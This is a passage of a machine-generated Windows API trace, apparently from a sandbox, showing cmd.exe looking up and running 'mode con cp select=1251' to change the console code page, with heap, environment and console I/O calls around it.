	[0032.285] _wcsicmp (_String1="mode", _String2="DIR") returned 9
	[0032.285] _wcsicmp (_String1="mode", _String2="ERASE") returned 8
	[0032.285] _wcsicmp (_String1="mode", _String2="DEL") returned 9
	[0032.285] _wcsicmp (_String1="mode", _String2="TYPE") returned -7
	[0032.285] _wcsicmp (_String1="mode", _String2="COPY") returned 10
	[0032.285] _wcsicmp (_String1="mode", _String2="CD") returned 10
	[0032.285] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10
	[0032.285] _wcsicmp (_String1="mode", _String2="RENAME") returned -5
	[0032.285] _wcsicmp (_String1="mode", _String2="REN") returned -5
	[0032.285] _wcsicmp (_String1="mode", _String2="ECHO") returned 8
	[0032.285] _wcsicmp (_String1="mode", _String2="SET") returned -6
	[0032.285] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3
	[0032.285] _wcsicmp (_String1="mode", _String2="DATE") returned 9
	[0032.285] _wcsicmp (_String1="mode", _String2="TIME") returned -7
	[0032.285] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3
	[0032.285] _wcsicmp (_String1="mode", _String2="MD") returned 11
	[0032.285] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4
	[0032.285] _wcsicmp (_String1="mode", _String2="RD") returned -5
	[0032.285] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5
	[0032.285] _wcsicmp (_String1="mode", _String2="PATH") returned -3
	[0032.285] _wcsicmp (_String1="mode", _String2="GOTO") returned 6
	[0032.285] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6
	[0032.285] _wcsicmp (_String1="mode", _String2="CLS") returned 10
	[0032.285] _wcsicmp (_String1="mode", _String2="CALL") returned 10
	[0032.285] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9
	[0032.285] _wcsicmp (_String1="mode", _String2="VER") returned -9
	[0032.285] _wcsicmp (_String1="mode", _String2="VOL") returned -9
	[0032.285] _wcsicmp (_String1="mode", _String2="EXIT") returned 8
	[0032.285] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6
	[0032.285] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8
	[0032.285] _wcsicmp (_String1="mode", _String2="TITLE") returned -7
	[0032.285] _wcsicmp (_String1="mode", _String2="START") returned -6
	[0032.285] _wcsicmp (_String1="mode", _String2="DPATH") returned 9
	[0032.285] _wcsicmp (_String1="mode", _String2="KEYS") returned 2
	[0032.285] _wcsicmp (_String1="mode", _String2="MOVE") returned -18
	[0032.285] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3
	[0032.285] _wcsicmp (_String1="mode", _String2="POPD") returned -3
	[0032.285] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12
	[0032.286] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7
	[0032.286] _wcsicmp (_String1="mode", _String2="BREAK") returned 11
	[0032.286] _wcsicmp (_String1="mode", _String2="COLOR") returned 10
	[0032.286] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4
	[0032.286] _wcsicmp (_String1="mode", _String2="DIR") returned 9
	[0032.286] _wcsicmp (_String1="mode", _String2="ERASE") returned 8
	[0032.286] _wcsicmp (_String1="mode", _String2="DEL") returned 9
	[0032.286] _wcsicmp (_String1="mode", _String2="TYPE") returned -7
	[0032.286] _wcsicmp (_String1="mode", _String2="COPY") returned 10
	[0032.286] _wcsicmp (_String1="mode", _String2="CD") returned 10
	[0032.286] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10
	[0032.286] _wcsicmp (_String1="mode", _String2="RENAME") returned -5
	[0032.286] _wcsicmp (_String1="mode", _String2="REN") returned -5
	[0032.286] _wcsicmp (_String1="mode", _String2="ECHO") returned 8
	[0032.286] _wcsicmp (_String1="mode", _String2="SET") returned -6
	[0032.286] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3
	[0032.286] _wcsicmp (_String1="mode", _String2="DATE") returned 9
	[0032.286] _wcsicmp (_String1="mode", _String2="TIME") returned -7
	[0032.286] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3
	[0032.286] _wcsicmp (_String1="mode", _String2="MD") returned 11
	[0032.286] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4
	[0032.286] _wcsicmp (_String1="mode", _String2="RD") returned -5
	[0032.286] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5
	[0032.286] _wcsicmp (_String1="mode", _String2="PATH") returned -3
	[0032.286] _wcsicmp (_String1="mode", _String2="GOTO") returned 6
	[0032.286] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6
	[0032.286] _wcsicmp (_String1="mode", _String2="CLS") returned 10
	[0032.286] _wcsicmp (_String1="mode", _String2="CALL") returned 10
	[0032.286] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9
	[0032.286] _wcsicmp (_String1="mode", _String2="VER") returned -9
	[0032.286] _wcsicmp (_String1="mode", _String2="VOL") returned -9
	[0032.286] _wcsicmp (_String1="mode", _String2="EXIT") returned 8
	[0032.286] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6
	[0032.286] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8
	[0032.286] _wcsicmp (_String1="mode", _String2="TITLE") returned -7
	[0032.286] _wcsicmp (_String1="mode", _String2="START") returned -6
	[0032.286] _wcsicmp (_String1="mode", _String2="DPATH") returned 9
	[0032.286] _wcsicmp (_String1="mode", _String2="KEYS") returned 2
	[0032.286] _wcsicmp (_String1="mode", _String2="MOVE") returned -18
	[0032.287] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3
	[0032.287] _wcsicmp (_String1="mode", _String2="POPD") returned -3
	[0032.287] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12
	[0032.287] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7
	[0032.287] _wcsicmp (_String1="mode", _String2="BREAK") returned 11
	[0032.287] _wcsicmp (_String1="mode", _String2="COLOR") returned 10
	[0032.287] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4
	[0032.287] _wcsicmp (_String1="mode", _String2="FOR") returned 7
	[0032.287] _wcsicmp (_String1="mode", _String2="IF") returned 4
	[0032.287] _wcsicmp (_String1="mode", _String2="REM") returned -5
	[0032.287] GetProcessHeap () returned 0x2f0000
	[0032.287] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x2f1ab0
	[0032.287] GetProcessHeap () returned 0x2f0000
	[0032.287] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x42) returned 0x3098a0
	[0032.287] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10
	[0032.287] GetProcessHeap () returned 0x2f0000
	[0032.287] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x309a80
	[0032.287] SetErrorMode (uMode=0x0) returned 0x0
	[0032.287] SetErrorMode (uMode=0x1) returned 0x0
	[0032.287] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x309a90, lpFilePart=0x13ec80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x13ec80*="Desktop") returned 0x25
	[0032.287] SetErrorMode (uMode=0x0) returned 0x1
	[0032.288] GetProcessHeap () returned 0x2f0000
	[0032.288] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309a80, Size=0x66) returned 0x309a80
	[0032.288] GetProcessHeap () returned 0x2f0000
	[0032.288] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309a80) returned 0x66
	[0032.288] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0032.288] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0032.288] GetProcessHeap () returned 0x2f0000
	[0032.288] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x128) returned 0x2f1cd0
	[0032.288] GetProcessHeap () returned 0x2f0000
	[0032.288] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x240) returned 0x309b00
	[0032.294] GetProcessHeap () returned 0x2f0000
	[0032.294] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309b00, Size=0x12a) returned 0x309b00
	[0032.294] GetProcessHeap () returned 0x2f0000
	[0032.294] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309b00) returned 0x12a
	[0032.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0032.294] GetProcessHeap () returned 0x2f0000
	[0032.294] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x305b70
	[0032.294] GetProcessHeap () returned 0x2f0000
	[0032.294] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x305b70, Size=0x7e) returned 0x305b70
	[0032.294] GetProcessHeap () returned 0x2f0000
	[0032.294] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305b70) returned 0x7e
	[0032.296] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0032.296] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0xffffffffffffffff
	[0032.296] GetLastError () returned 0x2
	[0032.296] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0xffffffffffffffff
	[0032.297] GetLastError () returned 0x2
	[0032.297] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0032.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0x305c00
	[0032.297] GetProcessHeap () returned 0x2f0000
	[0032.297] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x28) returned 0x304640
	[0032.297] FindClose (in: hFindFile=0x305c00 | out: hFindFile=0x305c00) returned 1
	[0032.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0x305c00
	[0032.297] GetProcessHeap () returned 0x2f0000
	[0032.297] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x304640, Size=0x8) returned 0x3098f0
	[0032.297] FindClose (in: hFindFile=0x305c00 | out: hFindFile=0x305c00) returned 1
	[0032.297] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
	[0032.297] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
	[0032.297] GetConsoleTitleW (in: lpConsoleTitle=0x13ef40, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a
	[0032.297] GetProcessHeap () returned 0x2f0000
	[0032.297] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x21c) returned 0x309c40
	[0032.297] GetConsoleTitleW (in: lpConsoleTitle=0x309c50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a
	[0032.298] GetProcessHeap () returned 0x2f0000
	[0032.298] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309c40, Size=0xa8) returned 0x309c40
	[0032.298] GetProcessHeap () returned 0x2f0000
	[0032.298] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309c40) returned 0xa8
	[0032.298] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - mode  con cp select=1251") returned 1
	[0032.299] GetProcessHeap () returned 0x2f0000
	[0032.299] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309c40 | out: hHeap=0x2f0000) returned 1
	[0032.299] InitializeProcThreadAttributeList (in: lpAttributeList=0x13ecf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x13ecb8 | out: lpAttributeList=0x13ecf8, lpSize=0x13ecb8) returned 1
	[0032.299] UpdateProcThreadAttribute (in: lpAttributeList=0x13ecf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x13eca8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x13ecf8, lpPreviousValue=0x0) returned 1
	[0032.299] GetStartupInfoW (in: lpStartupInfo=0x13ee10 | out: lpStartupInfo=0x13ee10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xec, hStdOutput=0xf8, hStdError=0xf8)) 
	[0032.299] GetProcessHeap () returned 0x2f0000
	[0032.299] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304640
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.299] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0032.300] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0032.300] GetProcessHeap () returned 0x2f0000
	[0032.300] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304640 | out: hHeap=0x2f0000) returned 1
	[0032.300] GetProcessHeap () returned 0x2f0000
	[0032.300] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x308900
	[0032.300] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode  con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x13ed30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode  con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x13ece0 | out: lpCommandLine="mode  con cp select=1251", lpProcessInformation=0x13ece0*(hProcess=0x54, hThread=0x50, dwProcessId=0x974, dwThreadId=0x978)) returned 1
	[0032.397] CloseHandle (hObject=0x50) returned 1
	[0032.397] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0032.397] GetProcessHeap () returned 0x2f0000
	[0032.397] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30c230 | out: hHeap=0x2f0000) returned 1
	[0032.397] GetEnvironmentStringsW () returned 0x30aa10*
	[0032.397] GetProcessHeap () returned 0x2f0000
	[0032.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30b500
	[0032.397] FreeEnvironmentStringsW (penv=0x30aa10) returned 1
	[0032.397] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000
	[0032.397] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0
	[0032.397] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x13e5e8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x13e5e8, ReturnLength=0x0) returned 0x0
	[0032.397] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x13e620, nSize=0x380, lpNumberOfBytesRead=0x13e5e0 | out: lpBuffer=0x13e620*, lpNumberOfBytesRead=0x13e5e0*=0x380) returned 1
	[0032.398] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0032.807] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x13ec28 | out: lpExitCode=0x13ec28*=0x0) returned 1
	[0032.807] CloseHandle (hObject=0x54) returned 1
	[0032.807] _vsnwprintf (in: _Buffer=0x13ee98, _BufferCount=0x13, _Format="%08X", _ArgList=0x13ec38 | out: _Buffer="00000000") returned 8
	[0032.807] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0032.807] GetProcessHeap () returned 0x2f0000
	[0032.807] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b500 | out: hHeap=0x2f0000) returned 1
	[0032.807] GetEnvironmentStringsW () returned 0x30aa10*
	[0032.807] GetProcessHeap () returned 0x2f0000
	[0032.807] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30eb10
	[0032.807] FreeEnvironmentStringsW (penv=0x30aa10) returned 1
	[0032.807] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0032.807] GetProcessHeap () returned 0x2f0000
	[0032.807] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30eb10 | out: hHeap=0x2f0000) returned 1
	[0032.807] GetEnvironmentStringsW () returned 0x30aa10*
	[0032.807] GetProcessHeap () returned 0x2f0000
	[0032.807] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30eb10
	[0032.807] FreeEnvironmentStringsW (penv=0x30aa10) returned 1
	[0032.807] GetProcessHeap () returned 0x2f0000
	[0032.807] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308900 | out: hHeap=0x2f0000) returned 1
	[0032.807] DeleteProcThreadAttributeList (in: lpAttributeList=0x13ecf8 | out: lpAttributeList=0x13ecf8) 
	[0032.908] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1
	[0032.909] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.909] SetConsoleMode (hConsoleHandle=0xf8, dwMode=0x0) returned 0
	[0032.909] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.909] GetConsoleMode (in: hConsoleHandle=0xf8, lpMode=0x4a51e194 | out: lpMode=0x4a51e194) returned 0
	[0032.909] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.909] GetConsoleMode (in: hConsoleHandle=0xec, lpMode=0x4a51e198 | out: lpMode=0x4a51e198) returned 0
	[0032.909] GetConsoleOutputCP () returned 0x4e3
	[0032.909] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1
	[0032.910] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305b70 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309b00 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1cd0 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309a80 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3098a0 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1ab0 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306510 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304610 | out: hHeap=0x2f0000) returned 1
	[0032.910] GetProcessHeap () returned 0x2f0000
	[0032.910] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3097e0 | out: hHeap=0x2f0000) returned 1
	[0032.910] _vsnwprintf (in: _Buffer=0x4a536340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x13f158 | out: _Buffer="\r\n") returned 2
	[0032.910] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.910] GetFileType (hFile=0xf8) returned 0x3
	[0032.910] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.910] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0032.911] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13f128, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f128*=0x2, lpOverlapped=0x0) returned 1
	[0032.911] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4
	[0032.911] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a52c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0032.911] _vsnwprintf (in: _Buffer=0x4a51eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x13f168 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37
	[0032.911] _vsnwprintf (in: _Buffer=0x4a51ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x13f168 | out: _Buffer=">") returned 1
	[0032.911] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.911] GetFileType (hFile=0xf8) returned 0x3
	[0032.911] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.911] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39
	[0032.911] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x13f158, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f158*=0x26, lpOverlapped=0x0) returned 1
	[0032.912] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.912] GetFileType (hFile=0xec) returned 0x3
	[0032.912] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.912] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.912] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.912] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1
	[0032.912] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.912] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.912] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.912] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1
	[0032.912] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.912] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
